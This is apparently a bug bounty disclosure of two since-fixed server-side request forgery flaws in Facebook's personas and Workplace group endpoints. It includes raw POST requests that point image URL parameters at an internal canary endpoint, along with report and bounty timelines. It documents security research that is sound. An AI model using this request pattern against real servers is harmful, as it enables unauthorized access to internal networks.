Facebook Server Side Request Forgery (SSRF)
Either of the following bugs could have given an attacker the ability to make arbitrary HTTP requests to servers inside Facebook's production network. In both cases the server fetched an attacker-supplied image URL (a persona profile picture, a group cover photo) without restricting where that URL could point, so pointing it at Facebook's internal canary-token endpoint made Facebook's own infrastructure issue the request.
Facebook SSRF via /me/personas
There is an SSRF in the graph.facebook.com/me/personas endpoint: the value of profile_picture_url is fetched server-side, with no check on the destination host.
POST /me/personas/ HTTP/1.1
Host: graph.facebook.com

name=SomePersona&profile_picture_url=https://www.internalfb.com/intern/bug-bounty/get-canary-token/
Timeline
Oct 7, 2019 – Report sent
Oct 7, 2019 – Request to test with canary by Facebook
Oct 9, 2019 – Fixed by Facebook
Nov 7, 2019 – $30,000 bounty awarded by Facebook
Facebook SSRF via /ajax/groups/create_post/
There is an SSRF in the /ajax/groups/create_post/ XController endpoint on Workplace: the value of cover_photo_url is fetched server-side, again with no check on the destination host.
POST /ajax/groups/create_post/ HTTP/1.1
Host: work-instance.workplace.com

name=SomeGroup&cover_photo_url=https://www.internalfb.com/intern/bug-bounty/get-canary-token/
Timeline
Mar 11, 2020 – Report sent
Mar 11, 2020 – Further investigation by Facebook
Mar 12, 2020 – Fixed by Facebook
Mar 18, 2020 – $30,000 bounty awarded by Facebook